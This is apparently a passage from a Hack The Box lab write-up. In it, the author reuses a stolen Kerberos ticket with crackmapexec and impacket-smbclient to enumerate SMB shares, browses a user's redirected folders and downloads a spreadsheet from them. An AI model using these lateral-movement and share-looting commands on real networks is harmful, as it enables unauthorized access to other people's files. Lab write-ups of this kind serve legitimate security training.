edgar.jacobs Session
Checking the SMB access level of the edgar.jacobs user after compromising the account
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=edgar.jacobs@research.search.htb.ccache crackmapexec smb research.search.htb -k --use-kcache --kdcHost research.search.htb --shares
SMB research.search.htb 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB research.search.htb 445 RESEARCH [+] search.htb\ from ccache
SMB research.search.htb 445 RESEARCH [+] Enumerated shares
SMB research.search.htb 445 RESEARCH Share Permissions Remark
SMB research.search.htb 445 RESEARCH ----- ----------- ------
SMB research.search.htb 445 RESEARCH ADMIN$ Remote Admin
SMB research.search.htb 445 RESEARCH C$ Default share
SMB research.search.htb 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB research.search.htb 445 RESEARCH helpdesk READ
SMB research.search.htb 445 RESEARCH IPC$ READ Remote IPC
SMB research.search.htb 445 RESEARCH NETLOGON READ Logon server share
SMB research.search.htb 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB research.search.htb 445 RESEARCH SYSVOL READ Logon server share
As I speculated previously, the edgar.jacobs user, as a member of the HelpDesk group, does have access to the //research.search.htb/helpdesk share.
//research.search.htb/helpdesk Share
┌──(kali㉿kali)-[~/…/htb/labs/search/smb]
└─$ KRB5CCNAME=../edgar.jacobs@research.search.htb.ccache impacket-smbclient SEARCH.HTB/@research.search.htb -k -no-pass -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use helpdesk
# ls
drw-rw-rw- 0 Tue Apr 14 12:24:23 2020 .
drw-rw-rw- 0 Tue Apr 14 12:24:23 2020 ..
I did expect to find something here, but it’s empty.
//research.search.htb/RedirectedFolders$ Share
# use RedirectedFolders$
# cd edgar.jacobs
# tree .
/edgar.jacobs/Desktop/$RECYCLE.BIN
/edgar.jacobs/Desktop/desktop.ini
/edgar.jacobs/Desktop/Microsoft Edge.lnk
/edgar.jacobs/Desktop/Phishing_Attempt.xlsx
/edgar.jacobs/Documents/$RECYCLE.BIN
/edgar.jacobs/Documents/desktop.ini
/edgar.jacobs/Downloads/$RECYCLE.BIN
/edgar.jacobs/Downloads/desktop.ini
/edgar.jacobs/Desktop/$RECYCLE.BIN/desktop.ini
/edgar.jacobs/Documents/$RECYCLE.BIN/desktop.ini
/edgar.jacobs/Downloads/$RECYCLE.BIN/desktop.ini
Finished - 14 files and folders
However, there is an interesting Excel file in the home directory of the edgar.jacobs user.
# get /edgar.jacobs/Desktop/Phishing_Attempt.xlsx
I will download it to Kali and review it further.